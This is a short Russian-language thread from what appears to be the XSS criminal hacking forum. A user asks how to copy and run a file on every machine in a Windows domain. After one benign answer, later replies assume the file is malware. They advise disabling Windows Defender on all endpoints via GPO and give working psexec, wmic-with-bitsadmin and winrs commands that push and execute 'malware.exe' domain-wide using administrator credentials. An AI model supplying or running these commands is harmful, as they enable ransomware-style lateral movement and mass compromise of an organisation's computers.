• XSS.stack #1 – первый литературный журнал от юзеров форума

Как скопировать и запустить файл на весь домен?

Отслеживать
Syrex

Syrex

CD-диск
Пользователь
Регистрация
10.08.2021
Сообщения
11
Реакции
0
Привет. Я хочу скопировать и запустить файл по всему домену. Через psexec пробовал не запускает, подскажите альтернативы psexec.

P.S Все запускал на контроллере домена.
 
Хочешь кому-то все компы в сети пропатчить? Похвально.

Так-то есть WMI, PowerShell Remoting. Через GPO, опять-же, можно скрипты запускать.
 
Последнее редактирование:
Syrex сказал(а):
Привет. Я хочу скопировать и запустить файл по всему домену. Через psexec пробовал не запускает, подскажите альтернативы psexec.

P.S Все запускал на контроллере домена.
почему через Psxec не получается? там вроде 2 типа запуска есть по домену и по локальной сети раскидать)
 
Пожалуйста, обратите внимание, что пользователь заблокирован
если этот файл является вредоносным, что, как я полагаю, вам сначала придется отключить защитник на каждой конечной точке. Можно сделать через GPO, если его windef, то psexec // * -c malware.exe
 
Пожалуйста, обратите внимание, что пользователь заблокирован
chapo сказал(а):
если этот файл является вредоносным, что, как я полагаю, вам сначала придется отключить защитник на каждой конечной точке. Можно сделать через GPO, если его windef, то psexec // * -c malware.exe
Это не сработает, если не ввести учетные данные админа. Лучше запускать так psexec \\* -u DOMAIN\ADMINISTRATOR -p PASSWORD -c C:\malware.exe
Если контроллер домена выдает ошибку, то надо запускать через wmic (не всегда работает)

wmic /node:@C:\с$\comps.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer malware \\DC01\c$\malware.exe %TEMP%\malware.exe&%TEMP%\malware.exe"

И так же через winrs: winrs -r:DC01 "cmd.exe /c C:\malware" Только на домен контроллере.
 
Пожалуйста, обратите внимание, что пользователь заблокирован
Krypt0n сказал(а):
Это не сработает, если не ввести учетные данные админа. Лучше запускать так psexec \\* -u DOMAIN\ADMINISTRATOR -p PASSWORD -c C:\malware.exe
Если контроллер домена выдает ошибку, то надо запускать через wmic (не всегда работает)

wmic /node:@C:\с$\comps.txt /user:"DOMAIN\Administrator" /password:"PASSWORD" process call create "cmd.exe /c bitsadmin /transfer malware \\DC01\c$\malware.exe %TEMP%\malware.exe&%TEMP%\malware.exe"

И так же через winrs: winrs -r:DC01 "cmd.exe /c C:\malware" Только на домен контроллере.
Я предполагал, что это DA / DC.

Приятно слышать тебя, мой друг)
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх